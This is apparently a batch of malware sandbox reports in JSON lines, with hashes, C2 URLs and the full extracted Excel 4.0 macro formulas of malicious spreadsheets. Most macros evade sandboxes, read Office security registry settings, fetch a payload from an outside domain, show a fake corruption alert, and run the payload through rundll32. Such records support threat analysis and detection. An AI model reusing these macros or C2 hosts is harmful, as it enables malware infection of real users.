{"version":"0.2","sample":{"sample":"","kind":"file","target":"770fe8ab9d824156fa9dfad3c71755f87ae44c89a3249ae1cc1b1f4470a9ba80"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"770fe8ab9d824156fa9dfad3c71755f87ae44c89a3249ae1cc1b1f4470a9ba80","filesize":221184,"md5":"1d989481fe4e5973011f79dfd2a9aa01","sha1":"71dd0bffd9a525fe534cdc858c492607e60c982e","sha256":"770fe8ab9d824156fa9dfad3c71755f87ae44c89a3249ae1cc1b1f4470a9ba80","sha512":"6d2231955c24749898e800a6efb418570ce5d0c120584b6cf0454df416b88b0f21277ad36bd695cc94e467ae7c7568ad7d056ec845bc1ac1f5201c6b596dd23e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"770fe8ab9d824156fa9dfad3c71755f87ae44c89a3249ae1cc1b1f4470a9ba80.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1c3XkFqti4\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7715bd494c84b9914c0a9d3543743875a62752fa1fd9de996d1a72c2b70e1020"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"7715bd494c84b9914c0a9d3543743875a62752fa1fd9de996d1a72c2b70e1020","filesize":104448,"md5":"1f68648058031fa278d002eee27e58de","sha1":"e440a178bb8d7f69a5efc437cfa99b06d9fed8f8","sha256":"7715bd494c84b9914c0a9d3543743875a62752fa1fd9de996d1a72c2b70e1020","sha512":"aed7eddc9e96f63a84305e7fb3be2b1eb1972bb96cd7c01cbe10fce1d2b494d0fb7db0cf344025294b614feb666f476d081a4f51b291d155e4c81616a077b241","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7715bd494c84b9914c0a9d3543743875a62752fa1fd9de996d1a72c2b70e1020.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"yO4D7Vo9SW\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7745a7ee24a42a4633560b881266f7e695320eb5b0b5117b9103e1d7d618d8dd"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"7745a7ee24a42a4633560b881266f7e695320eb5b0b5117b9103e1d7d618d8dd","filesize":132608,"md5":"6835f375c4ad0c30035a61fe421654cd","sha1":"6fe7528dd23d96e67e912effce7a290f141f7a01","sha256":"7745a7ee24a42a4633560b881266f7e695320eb5b0b5117b9103e1d7d618d8dd","sha512":"299186ffa13fec75a19afc21fa7fbb655c1cc070028bbee06dcab6a10a701812f1d248f03451edc65843b86a73cd2e0efe6f697f8c84c3aea2e80c7755f1aa85","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7745a7ee24a42a4633560b881266f7e695320eb5b0b5117b9103e1d7d618d8dd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EBsUNuSzTa\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"774c328f8ade6735039fbcfcc73833c6270951f4fcfc7cbda3bea7081eac8e59"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"774c328f8ade6735039fbcfcc73833c6270951f4fcfc7cbda3bea7081eac8e59","filesize":209920,"md5":"74e22be794b3876cd6b8c35b6b35352f","sha1":"159fa0424c6b34321fd3d00518629206636fefff","sha256":"774c328f8ade6735039fbcfcc73833c6270951f4fcfc7cbda3bea7081eac8e59","sha512":"58e128fe5fa3a6e5261291c0924960b920aab1958b937e3f6169544a3da1b67ed3fdc9a88ac79901616648e7e70553a6e3d04b2e34a19c998620797a88ef7964","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"774c328f8ade6735039fbcfcc73833c6270951f4fcfc7cbda3bea7081eac8e59.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IUYzscX5DY\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7756706887d36035531b71e6450d1024f616668b4bf3938a03ee3848f32a5871"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"7756706887d36035531b71e6450d1024f616668b4bf3938a03ee3848f32a5871","filesize":177152,"md5":"43c8fb6ac00aa104ab8e2f831fd22167","sha1":"9bfd92d01f3e975049761bfef91962800261faa3","sha256":"7756706887d36035531b71e6450d1024f616668b4bf3938a03ee3848f32a5871","sha512":"b95951d5a53f12a1d3b3a7d2a80aaf6264704aefc2d0de463be84e415764004010e89457174303945d6922ef62d3327731802e38680910bc3feb72695d635b42","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7756706887d36035531b71e6450d1024f616668b4bf3938a03ee3848f32a5871.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"n1vWOICvQI\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"77899c0b8d937b7f32425e051e978be6e3ea58ed72fa3eadea320ae753de4026"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"77899c0b8d937b7f32425e051e978be6e3ea58ed72fa3eadea320ae753de4026","filesize":214016,"md5":"9673bbba8899977c4b8d0d641b5410c1","sha1":"84e1c423483f98eeeb10f5f93a769f77d3663d44","sha256":"77899c0b8d937b7f32425e051e978be6e3ea58ed72fa3eadea320ae753de4026","sha512":"96df51335d8234af72efb982b84659d274739d5faedb75198d1da376512a0605bcc69ec6697221d4499ba7dc50047d102c1419113bf72addfff2cf74aedb8857","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77899c0b8d937b7f32425e051e978be6e3ea58ed72fa3eadea320ae753de4026.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bBtPFMUdRb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"778a2fed59d08ec49ed151fbffe12e0bce071686b33aff51dbd0f2ea6be3caf3"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"778a2fed59d08ec49ed151fbffe12e0bce071686b33aff51dbd0f2ea6be3caf3","filesize":206336,"md5":"9eb90de952b4f4d36fec976c2de8dd04","sha1":"25c7cf9749ba81b58097dcd8fbbb067ce172e6dd","sha256":"778a2fed59d08ec49ed151fbffe12e0bce071686b33aff51dbd0f2ea6be3caf3","sha512":"38a2551665171bb9b0ab54c6c38d0452bca37ca70e2fc3bc864e8e46fb2c2669de1cf46a15f59261a3f978a166a82a2808415042dc23119011f85a33e1d90df3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"778a2fed59d08ec49ed151fbffe12e0bce071686b33aff51dbd0f2ea6be3caf3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2IAMVr0N2g\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"779ece97cca0380b4b52f94dae6c3c568db19fa895b1e50bb474f625cc7b6d67"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"779ece97cca0380b4b52f94dae6c3c568db19fa895b1e50bb474f625cc7b6d67","filesize":209920,"md5":"eb37464f93e90c6e6e7a3feb5b6c2668","sha1":"8f4b1d80576f97a31a7d220017ed062cafd86d61","sha256":"779ece97cca0380b4b52f94dae6c3c568db19fa895b1e50bb474f625cc7b6d67","sha512":"3890148968554bc4ae0bd78c16314b953b9ad358efbcfbb4f5a5fd58be51ff3c031bb07ab18f93bbf6cf547f183769f87ef5c74156ea0a9ba87117500341a8a8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"779ece97cca0380b4b52f94dae6c3c568db19fa895b1e50bb474f625cc7b6d67.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6i6MpgQEgJ\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"77b2795604c214ef655100ca602bbe0cf986e457a8ecadcf0157528e8bd8bd24"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"77b2795604c214ef655100ca602bbe0cf986e457a8ecadcf0157528e8bd8bd24","filesize":185344,"md5":"f2a13059dee528c215c5402994d736ab","sha1":"7bbb39d8b63127fdd64433cfa687554f65e0f28b","sha256":"77b2795604c214ef655100ca602bbe0cf986e457a8ecadcf0157528e8bd8bd24","sha512":"2dc34b1bb7eec8272a84a38fffbfc5719871a243a20a9ad23bbe4bb39d5efe2d5f383edad5f509e7fd24e28ea5291a6c02c43a74824fe4baa2cbd2c7b24eb21d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77b2795604c214ef655100ca602bbe0cf986e457a8ecadcf0157528e8bd8bd24.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"77b5311f40dc608f872d92ec5c81d05a832e7a9b95aa054f581e3c90ac0addea"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"77b5311f40dc608f872d92ec5c81d05a832e7a9b95aa054f581e3c90ac0addea","filesize":177152,"md5":"a75baa2ddce0fe5dc974ea610a7cde90","sha1":"94e6601f3dfe8df9132ee8f3b91f8fcebc84e172","sha256":"77b5311f40dc608f872d92ec5c81d05a832e7a9b95aa054f581e3c90ac0addea","sha512":"4a8c8c6ef358b23d76ec9f918a055c5b7f77a5f96a2d8d6dbbc42bbc6bfab0b1bd971b4440d310f47d8093725d8687d9a8b83f9b0bb8d86848db3eb7bf027ab0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77b5311f40dc608f872d92ec5c81d05a832e7a9b95aa054f581e3c90ac0addea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dT4XWNcIMY\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"77cce18398967950983b805a26b8e9201f544dd4633286cf710fb3e5e6aab745"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"77cce18398967950983b805a26b8e9201f544dd4633286cf710fb3e5e6aab745","filesize":185344,"md5":"b7dc076008f0876fe0ec1ded441f87d6","sha1":"75fa24c90a93d1eb74afeb098a24bc8fc41bb646","sha256":"77cce18398967950983b805a26b8e9201f544dd4633286cf710fb3e5e6aab745","sha512":"9db79fddc015e7b46e989aa9cefcda51e8b16d6f3de376707a196e3ee4177d3e22c740e268bb5f3165ece255b4e2ec0ab310567e174d87668ecc268f4e48aac6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77cce18398967950983b805a26b8e9201f544dd4633286cf710fb3e5e6aab745.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"77db586b1fef045b95ee0819736a0f5bd83ad816e670baeb6c780ffe04e6bce6"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"77db586b1fef045b95ee0819736a0f5bd83ad816e670baeb6c780ffe04e6bce6","filesize":168448,"md5":"f3ba6109ff9eede298f7999c62ec75c7","sha1":"37d7ffe57f7412314dcd2e41d60bb5bdd55e0da2","sha256":"77db586b1fef045b95ee0819736a0f5bd83ad816e670baeb6c780ffe04e6bce6","sha512":"336951286d06068ad0c03e90b892d0f165679fb1230ad8b556146586e0d350c46b737868fe99c43fee9339513fd3fb502e2bd4276fa9a6847e7d5d511f0f09dd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77db586b1fef045b95ee0819736a0f5bd83ad816e670baeb6c780ffe04e6bce6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"meCMkEVWFm\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"77ed67475a0a68bd2f5a1371b340d6be797e9d0104577684d845c05a07669599"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"77ed67475a0a68bd2f5a1371b340d6be797e9d0104577684d845c05a07669599","filesize":185344,"md5":"5d2f22080e0aa1b5de4da4900270cc75","sha1":"3e87a25aaa44c83b02ad7c01517818fe9ef35f39","sha256":"77ed67475a0a68bd2f5a1371b340d6be797e9d0104577684d845c05a07669599","sha512":"19022b572b21f75d82b1a66a0c375650b835677b39921b51d4f63ad738d376d9a6e1d26d4f899be2a13bcd0fe5cc35065686e2d741d598d5ae45f6500c7fc4af","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77ed67475a0a68bd2f5a1371b340d6be797e9d0104577684d845c05a07669599.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"77f1407e4feedee08eba2b2d888c4445c69a6655238e39f70ed8734d45ced55d"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"77f1407e4feedee08eba2b2d888c4445c69a6655238e39f70ed8734d45ced55d","filesize":209920,"md5":"fee874c2c7191b23be0e6d9c0261ebe3","sha1":"4aa3d2a5dd448e846865247e9a9e0c3e66701bbc","sha256":"77f1407e4feedee08eba2b2d888c4445c69a6655238e39f70ed8734d45ced55d","sha512":"238093c5bd3fc8cc4c95842fa884a4b1b5e8526466d8d58329c80ac0414be2fa71758225e9dcf812b7141d744640d0bf8e24dda857370694e879fde389b92dd2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77f1407e4feedee08eba2b2d888c4445c69a6655238e39f70ed8734d45ced55d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sGXVfdkh1Q\",TRUE)\nGOTO(R$0C$16)"}}}]}
